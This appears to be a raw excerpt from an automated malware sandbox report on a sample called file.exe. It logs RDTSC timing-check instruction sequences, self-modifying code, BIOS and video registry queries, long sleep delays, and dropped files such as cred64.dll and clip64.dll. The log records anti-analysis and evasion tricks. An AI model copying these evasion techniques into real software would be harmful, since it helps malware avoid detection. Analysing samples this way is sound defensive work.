                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0100 second address: 54F0120 instructions: 0x00000000 rdtsc 0x00000002 mov dh, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, 6283779Eh 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F122870CBD1h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0120 second address: 54F0126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0126 second address: 54F0149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b jmp 00007F122870CBCFh 0x00000010 mov ebx, dword ptr [ebp+10h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0149 second address: 54F014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F014D second address: 54F0168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0168 second address: 54F016E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F016E second address: 54F0172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0172 second address: 54F0190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1228D24AC3h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0190 second address: 54F01E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F122870CBCFh 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 mov cx, B9F7h 0x00000016 mov si, FE93h 0x0000001a popad 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e jmp 00007F122870CBD6h 0x00000023 xchg eax, edi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F122870CBD7h 0x0000002b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F01E8 second address: 54F01EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F01EE second address: 54F021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F122870CBCCh 0x00000010 sbb eax, 2BB80CA8h 0x00000016 jmp 00007F122870CBCBh 0x0000001b popfd 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F021A second address: 54F0275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 xchg eax, edi 0x00000007 pushad 0x00000008 mov bx, ax 0x0000000b mov si, 8369h 0x0000000f popad 0x00000010 test esi, esi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F1228D24AC2h 0x00000019 jmp 00007F1228D24AC5h 0x0000001e popfd 0x0000001f pushad 0x00000020 mov edx, ecx 0x00000022 push esi 0x00000023 pop ebx 0x00000024 popad 0x00000025 popad 0x00000026 je 00007F129A752E6Eh 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F1228D24ABEh 0x00000035 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0275 second address: 54F0284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0284 second address: 54F029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1228D24AC4h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F029C second address: 54F02B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02B1 second address: 54F02B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02B5 second address: 54F02CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02CD second address: 54F02D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02D3 second address: 54F02D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F02D7 second address: 54F034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F129A752E02h 0x0000000e jmp 00007F1228D24AC9h 0x00000013 mov edx, dword ptr [esi+44h] 0x00000016 pushad 0x00000017 push esi 0x00000018 call 00007F1228D24AC3h 0x0000001d pop eax 0x0000001e pop edi 0x0000001f mov ebx, eax 0x00000021 popad 0x00000022 or edx, dword ptr [ebp+0Ch] 0x00000025 jmp 00007F1228D24AC0h 0x0000002a test edx, 61000000h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F1228D24AC7h 0x00000037 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F034D second address: 54F03C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F129A13AEE4h 0x0000000f jmp 00007F122870CBCEh 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 jmp 00007F122870CBD0h 0x0000001d jne 00007F129A13AED5h 0x00000023 jmp 00007F122870CBD0h 0x00000028 test bl, 00000007h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F122870CBD7h 0x00000032 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E078D second address: 54E07CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1228D24AC1h 0x00000009 sub esi, 188FC996h 0x0000000f jmp 00007F1228D24AC1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1228D24ABDh 0x00000020 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E07CD second address: 54E07D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E07D2 second address: 54E080D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F1228D24AC6h 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1228D24AC7h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E080D second address: 54E0845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F122870CBD3h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0845 second address: 54E084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E084A second address: 54E08DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F122870CBCEh 0x00000013 or ecx, 68A58268h 0x00000019 jmp 00007F122870CBCBh 0x0000001e popfd 0x0000001f movzx ecx, bx 0x00000022 popad 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007F122870CBCEh 0x0000002a mov esi, 45333961h 0x0000002f popad 0x00000030 mov dword ptr [esp], ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F122870CBD9h 0x0000003c add eax, 3AA165E6h 0x00000042 jmp 00007F122870CBD1h 0x00000047 popfd 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E08DB second address: 54E08E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E08E0 second address: 54E08EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F122870CBCAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E08EE second address: 54E093D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov edi, ecx 0x0000000c pushfd 0x0000000d jmp 00007F1228D24AC6h 0x00000012 add si, EBE8h 0x00000017 jmp 00007F1228D24ABBh 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [esp], esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F1228D24AC5h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E093D second address: 54E094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F122870CBCCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E094D second address: 54E0951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0951 second address: 54E0968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F122870CBCAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0968 second address: 54E097E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E097E second address: 54E0982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0982 second address: 54E0A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushfd 0x00000008 jmp 00007F1228D24ABAh 0x0000000d and ecx, 768DB308h 0x00000013 jmp 00007F1228D24ABBh 0x00000018 popfd 0x00000019 pop esi 0x0000001a popad 0x0000001b test esi, esi 0x0000001d jmp 00007F1228D24ABFh 0x00000022 je 00007F129A75A48Bh 0x00000028 jmp 00007F1228D24AC6h 0x0000002d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F1228D24ABEh 0x0000003b adc ax, A7C8h 0x00000040 jmp 00007F1228D24ABBh 0x00000045 popfd 0x00000046 call 00007F1228D24AC8h 0x0000004b jmp 00007F1228D24AC2h 0x00000050 pop ecx 0x00000051 popad 0x00000052 mov ecx, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0A31 second address: 54E0A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0A35 second address: 54E0A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0A39 second address: 54E0A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0A3F second address: 54E0A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0A45 second address: 54E0A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0A49 second address: 54E0A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F129A75A408h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0A5C second address: 54E0A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0A63 second address: 54E0ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FA6968h], 00000002h 0x00000010 pushad 0x00000011 mov edx, esi 0x00000013 mov edi, eax 0x00000015 popad 0x00000016 jne 00007F129A75A3E1h 0x0000001c pushad 0x0000001d mov ah, 25h 0x0000001f mov ax, bx 0x00000022 popad 0x00000023 mov edx, dword ptr [ebp+0Ch] 0x00000026 pushad 0x00000027 mov ax, bx 0x0000002a mov esi, edi 0x0000002c popad 0x0000002d push ebx 0x0000002e jmp 00007F1228D24AC0h 0x00000033 mov dword ptr [esp], ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0ABC second address: 54E0AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54E0AC0 second address: 54E0ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: BACABB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Special instruction interceptor: First address: 5FCABB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Special instruction interceptor: First address: 90798C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Special instruction interceptor: First address: AD4CBF instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Special instruction interceptor: First address: 107798C instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe | Special instruction interceptor: First address: 1244CBF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | Special instruction interceptor: First address: 8CB7A7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | Special instruction interceptor: First address: 8CB895 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | Special instruction interceptor: First address: A90C4F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe | Special instruction interceptor: First address: 8CB794 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe | Special instruction interceptor: First address: EE798C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe | Special instruction interceptor: First address: 10B4CBF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Special instruction interceptor: First address: A6B7A7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Special instruction interceptor: First address: A6B895 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Special instruction interceptor: First address: C30C4F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Special instruction interceptor: First address: A6B794 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe | Memory allocated: 6D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe | Memory allocated: 2460000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe | Memory allocated: A60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_05560D2E rdtsc 0_2_05560D2E
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Window / User API: threadDelayed 1272
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Window / User API: threadDelayed 1286
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Window / User API: threadDelayed 1280
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Window / User API: threadDelayed 1258
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Window / User API: threadDelayed 1191
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Window / User API: threadDelayed 991
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Window / User API: threadDelayed 1035
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | Window / User API: threadDelayed 1385
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sarra[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exe
Source: C:\Windows\System32\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000149001\gold.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exe
Source: C:\Windows\System32\svchost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\file300un[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\swiiii[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000208001\install.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000181001\file300un.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\install[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe | API coverage: 3.5 %
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 6052 | Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2452 | Thread sleep count: 1272 > 30
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2452 | Thread sleep time: -2545272s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 4164 | Thread sleep count: 1286 > 30
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 4164 | Thread sleep time: -2573286s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 6628 | Thread sleep count: 1280 > 30
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 6628 | Thread sleep time: -2561280s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2684 | Thread sleep count: 216 > 30
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2684 | Thread sleep time: -6480000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 4832 | Thread sleep count: 1258 > 30
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 4832 | Thread sleep time: -2517258s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2636 | Thread sleep time: -1260000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2472 | Thread sleep count: 1191 > 30
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2472 | Thread sleep time: -2383191s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7064 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe TID: 8188 | Thread sleep count: 1035 > 30
Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe TID: 8188 | Thread sleep count: 213 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7628 | Thread sleep count: 37 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1100 | Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe TID: 8852 | Thread sleep count: 107 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10860 | Thread sleep count: 42 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10860 | Thread sleep time: -84042s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10852 | Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10852 | Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10868 | Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10868 | Thread sleep time: -78039s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 2668 | Thread sleep count: 162 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 2668 | Thread sleep time: -4860000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 5324 | Thread sleep time: -1260000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10872 | Thread sleep count: 45 > 30
